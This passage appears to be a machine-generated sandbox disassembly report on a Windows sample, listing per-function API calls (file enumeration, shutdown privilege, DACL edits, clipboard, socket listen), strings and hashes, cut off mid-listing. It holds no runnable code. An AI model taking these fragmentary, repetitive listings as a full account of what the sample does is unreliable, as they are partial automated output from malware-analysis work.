                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                    • __swprintf.LIBCMT ref: 004789D3
                                                    • __swprintf.LIBCMT ref: 00478A1D
                                                    • __swprintf.LIBCMT ref: 00478A4B
                                                    • __swprintf.LIBCMT ref: 00478A79
                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                    • __swprintf.LIBCMT ref: 00478AA7
                                                    • __swprintf.LIBCMT ref: 00478AD5
                                                    • __swprintf.LIBCMT ref: 00478B03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 999945258-2428617273
                                                    • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                    • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                    • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                    • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                    • __wsplitpath.LIBCMT ref: 00403492
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcscpy.LIBCMT ref: 004034A7
                                                    • _wcscat.LIBCMT ref: 004034BC
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                    • _wcscpy.LIBCMT ref: 004035A0
                                                    • _wcslen.LIBCMT ref: 00403623
                                                    • _wcslen.LIBCMT ref: 0040367D
                                                    Strings
                                                    • _, xrefs: 0040371C
                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                    • Error opening the file, xrefs: 00428231
                                                    • Unterminated string, xrefs: 00428348
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                    • API String ID: 3393021363-188983378
                                                    • Opcode ID: b09ed5fe91e13c81baa094617643eef460dbacb947cc1a11d73a8daefe1aa9ab
                                                    • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                    • Opcode Fuzzy Hash: b09ed5fe91e13c81baa094617643eef460dbacb947cc1a11d73a8daefe1aa9ab
                                                    • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                    • FindClose.KERNEL32(00000000), ref: 00431B20
                                                    • FindClose.KERNEL32(00000000), ref: 00431B34
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                    • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                    • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1409584000-438819550
                                                    • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                    • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                    • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                    • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                    • __swprintf.LIBCMT ref: 00431C2E
                                                    • _wcslen.LIBCMT ref: 00431C3A
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2192556992-3457252023
                                                    • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                    • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                    • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                    • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                    • __swprintf.LIBCMT ref: 004722B9
                                                    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                    • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                    • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                    • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                    • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                    • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                    • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: FolderPath$LocalTime__swprintf
                                                    • String ID: %.3d
                                                    • API String ID: 3337348382-986655627
                                                    • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                    • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                    • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                    • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                    • FindClose.KERNEL32(00000000), ref: 0044291C
                                                    • FindClose.KERNEL32(00000000), ref: 00442930
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                    • FindClose.KERNEL32(00000000), ref: 004429D4
                                                      • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                    • FindClose.KERNEL32(00000000), ref: 004429E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 2640511053-438819550
                                                    • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                    • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                    • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                    • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                    • GetLastError.KERNEL32 ref: 00433414
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                    • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 2938487562-3733053543
                                                    • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                    • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                    • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                    • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                    APIs
                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                      • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                      • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                    • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                    • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                    • CopySid.ADVAPI32(00000000), ref: 00446271
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                    • String ID:
                                                    • API String ID: 1255039815-0
                                                    • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                    • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                    • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                    • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 00433073
                                                    • __swprintf.LIBCMT ref: 00433085
                                                    • __wcsicoll.LIBCMT ref: 00433092
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                    • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                    • LockResource.KERNEL32(00000000), ref: 004330CA
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                    • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                    • LockResource.KERNEL32(?), ref: 00433120
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                    • String ID:
                                                    • API String ID: 1158019794-0
                                                    • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                    • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                    • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                    • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                    • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                    • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                    • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                    • GetLastError.KERNEL32 ref: 0045D6BF
                                                    • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                    • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                    • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                    • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_strncmp
                                                    • String ID: @oH$\$^$h
                                                    • API String ID: 2175499884-3701065813
                                                    • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                    • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                    • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                    • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                    • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
